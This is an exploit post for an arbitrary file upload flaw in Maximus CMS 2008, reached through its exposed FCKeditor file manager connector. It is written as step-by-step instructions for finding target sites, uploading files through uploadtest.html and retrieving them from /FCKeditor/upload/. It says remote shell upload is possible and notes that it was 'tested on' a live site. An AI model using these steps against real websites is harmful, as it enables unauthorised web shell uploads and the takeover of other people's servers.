####################################################################
    maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
  
  
 ____                  __                              __    __              
/\  _`\               /\ \      __                    /\ \__/\ \             
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __ 
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                      
                                                \_/__/                       
 __      __          __          ______                       Author:eidelweiss
/\ \  __/\ \        /\ \        /\  _  \                         
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\       
                                              \/_/    \/_/       

                                                          
   |									     |	
  /|_________________________________________________________________________|\
 /									       \	
/===============================================================================\
|Exploit Title:	maximus-cms (fckeditor) Arbitrary File Upload Vulnerability	|
|develop:	http://www.php-maximus.org					|
|Download:	http://ftp1.toocharger.com/scgdnLI/maximus-cms-2008_5129.zip	|
|Version:	Maximus 2008 CMS: Web Portal System (v.1.1.2)			|
|Tested On:	Live site							|
|Dork:		use your skill and play your imagination :P			|
|Author:	eidelweiss							|
|contact:	eidelweiss[at]windowslive[dot]com				|
|Home:		http://www.eidelweiss.info					|
|										|
|										|
\===============================================================================/
/	NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT			\
---------------------------------------------------------------------------------

|============================================================================================|
|Original advisories:									     |
|http://eidelweiss-advisories.blogspot.com/2011/01/maximus-cms-fckeditor-arbitrary-file.html |
|============================================================================================|

	exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html

[!] first find the target host

	ex: www.site.com or www.target.com/maximus

	then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#

[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type

[!] Upload There Hacked.txt or whatever.txt  And Copy the Output Link or

[!] after upload without any errors your file will be here: /FCKeditor/upload/

		ex: http://site.com//FCKeditor/upload/whatever.txt


NB: remote shell upload also possible !!!

Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"

----------
$Config['Enabled'] = true ;	// <=


// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------

and also $Config['AllowedExtensions']['File']

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked


=========================| -=[ E0F ]=- |=================================